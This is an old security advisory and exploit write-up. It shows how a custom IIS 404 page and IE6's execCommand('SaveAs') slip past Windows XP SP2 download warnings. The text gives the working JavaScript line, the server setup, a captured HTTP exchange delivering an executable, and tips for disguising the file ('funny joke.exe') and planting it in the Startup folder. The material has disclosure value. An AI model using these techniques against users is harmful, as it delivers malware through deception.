Orginal Advisory and exploit by cyber_flash (Vengy) Circumvent Windows XP SP2 security features using execCommand 'SaveAs' function! Demonstration: Notice that you don't receive any warning messages such as: "File Download - Security Warning" or "Open File - Security Warning". If "Hide file extensions for known file types" (Tools->Folder Options...->View) is enabled, (ie., 'funny joke.exe' appears as 'funny joke') it's possible to trick a user into downloading a malicious executable file masquerading as an html document! Windows XP SP2 normally prevents direct downloading. For example: calc.exe Description: When your browser cannot locate the URL that you entered in the address bar, you will receive a 404 error message telling you that the file was not found. This exploit utilizes a custom HTTP 404 error message (v.exe) and feeds that eventually to the execCommand Method. User input is required because the method always prompts a "Save HTML Document" dialog. 1. Bypasses the "File Download - Security Warning". Each time you click a download link, WinXP pops up a "File Download- Security Warning", making you aware that Windows is downloading a program and asking for your permission to complete the download process. 2. Bypasses the "Open File - Security Warning". Launching a downloaded executable that originates from an untrusted location (zone) such as the Internet also brings up a "Open File - Security Warning" that asks for permission to install the file in case it's dangerous. The execCommand Method: Executes a command on the current document. One of the many parameters of this method is the SaveAs Command which saves the current Web page to a local file. The SaveAs Command has the following format: document.execCommand('SaveAs','1','Name of the webpage.htm'); Platforms Tested: * Microsoft Windows 2000 Server * Microsoft Windows XP Professional (IIS V5.1) * Internet Explorer Version: 6 * NOT tested on Windows 2003 Server. Exploit: The following code requires no special server setup, and should work from any webpage that IE 6.0 fetches: Click here. Also, here's an example that requires modifying the IIS Error Mapping Properties (see below): Click here. NOTE: Using 'C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\funny joke.exe' will place the file into the users Startup folder! The file v.exe (replace it with any file you like) within the IFRAME src attribute will be delivered to the user upon saving. Steps to configure IIS: Launch Internet Information Services manager. Under the 'Custom Errors' tab, modify the Error Mapping Properties as follows: 1. Error Code: 404 2. Default Text: Not Found 3. Message Type: URL 4. URL: /v.exe (name of the executable which you'd like to send to the user. ;) Within the HTML page, insert an IFRAME as follows: The file 'vengy404.htm' intentionally doesn't exist on the server, so it'll trigger a 404 error message as defined above. But, the javascript code below references the stealthy v.exe data within the frame 'NotFound' and is piped to 'funny joke.exe' when prompted to save the file: javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe'); Follow TCP Stream: Here's what occurs internally when fetching the exploit webpage plus the 404 error message (v.exe). GET /// HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Tue, 16 Nov 2004 02:34:44 GMT If-None-Match: "7e5914d584cbc41:10d2" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: insecure.hopto.org:53 Connection: Keep-Alive HTTP/1.1 304 Not Modified Server: Microsoft-IIS/5.1 Date: Tue, 16 Nov 2004 12:31:00 GMT Content-Location: http://insecure.hopto.org:53/index.htm ETag: "7e5914d584cbc41:10d2" Content-Length: 0 GET ///vengy404.htm HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: insecure.hopto.org:53 Connection: Keep-Alive HTTP/1.1 200 OK Server: Microsoft-IIS/5.1 Cache-Control: no-cache,no-transform Expires: Tue, 16 Nov 2004 12:31:00 GMT Content-Location: http://insecure.hopto.org:53/v.exe?404;http://insecure.hopto.org///vengy404.htm Vary: * Date: Tue, 16 Nov 2004 12:31:00 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Content-Length: 91408 <---V.EXE binary data goes here ---> Conclusion: Overall IE attempts to intercept risky code and prompts a security warning message, but it seems to allow custom HTTP errors to filter thru those security checks. Also, by creating a 404 .lnk shortcut file with a hotkey of 'Enter', saving it to the desktop installs a global hotkey, so it may be possible to execute the downloaded file by simply forcing the user to press the Enter key "alert('Thanks. Press Return')". Funny and scary how a few well placed characters